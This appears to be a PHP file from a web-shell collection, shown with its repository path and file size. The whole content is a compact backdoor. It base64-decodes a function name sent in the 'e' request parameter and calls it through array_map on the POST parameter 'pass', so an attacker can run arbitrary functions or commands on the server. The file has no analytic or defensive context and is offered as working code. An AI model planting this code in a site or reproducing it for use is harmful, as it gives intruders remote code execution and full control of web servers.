webshell/php/2020.08.20.11.php

5 lines
109 B
PHP

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);
?>